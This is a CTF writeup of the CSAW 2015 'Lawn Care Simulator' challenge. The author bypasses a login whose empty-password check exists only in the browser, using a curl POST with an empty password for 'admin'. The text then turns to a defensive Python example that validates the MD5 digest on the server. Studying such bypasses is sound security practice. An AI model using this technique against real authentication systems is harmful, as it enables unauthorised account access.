CSAW 2015 - Lawn Care Simulator (200pts) writeup

The challenge description was:

This web challenge was really easy; actually, it was so easy that I think it wasn't meant to be that way. When you visit the link, you are greeted with the following screen:

[Screenshot: CSAW 2015 - Lawn Care Simulator (200pts) writeup - 01]

Checking for SQL injection wasn't returning anything indicating it was what we had to do, so I checked the network traffic while trying to log in and got the following POST data:

**username:** test **password:** 098f6bcd4621d373cade4e832627b4f6

Trying to log in without any password wasn't possible, but that was only checked on the client side, so after trying it with curl in a terminal:

```
mrt$ curl '' --data 'username=admin&password='
<title>Lawn Care Simulator 2015</title>
<script src="//code.jquery.com/jquery-1.11.3.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
```

We got our flag:
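
From the defender's side, the empty-password check that the page only enforced in the browser has to be repeated on the server. The sketch below is an added example, not code from the challenge or from this writeup: it re-validates the POST body shown above (the `password` value is the MD5 hex digest of the typed password, here `test`) before comparing it in constant time. The `USERS` store and the `check_login` function are assumptions made for illustration.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qs

# Constructed account store (hypothetical): username -> MD5 hex digest,
# i.e. the value the browser puts in the "password" field.
USERS = {"test": hashlib.md5(b"test").hexdigest()}

MD5_HEX = re.compile(r"[0-9a-f]{32}")
DUMMY = "0" * 32  # compared against when the user is unknown


def check_login(body: str) -> bool:
    """Validate a form-encoded login body without trusting client-side checks."""
    form = parse_qs(body, keep_blank_values=True)
    users = form.get("username", [])
    digests = form.get("password", [])

    # Exactly one value per field; duplicated parameters are rejected.
    if len(users) != 1 or len(digests) != 1:
        return False
    user, digest = users[0], digests[0]

    # Server-side repeat of the "password must not be empty" rule:
    # only a full 32-character lowercase hex digest is accepted.
    if not user or not MD5_HEX.fullmatch(digest):
        return False

    # Constant-time comparison of the whole digest, also for unknown users,
    # so the response does not depend on how many characters matched.
    stored = USERS.get(user, DUMMY)
    matches = hmac.compare_digest(digest, stored)
    return matches and user in USERS


if __name__ == "__main__":
    # The request from the curl command above: empty password field.
    print(check_login("username=admin&password="))
    # The POST data captured in the browser for user "test".
    print(check_login("username=test&password=098f6bcd4621d373cade4e832627b4f6"))
```

Because the browser sends the digest itself, that digest is the credential as far as the server is concerned; hashing on the client does not replace a server-side password hash.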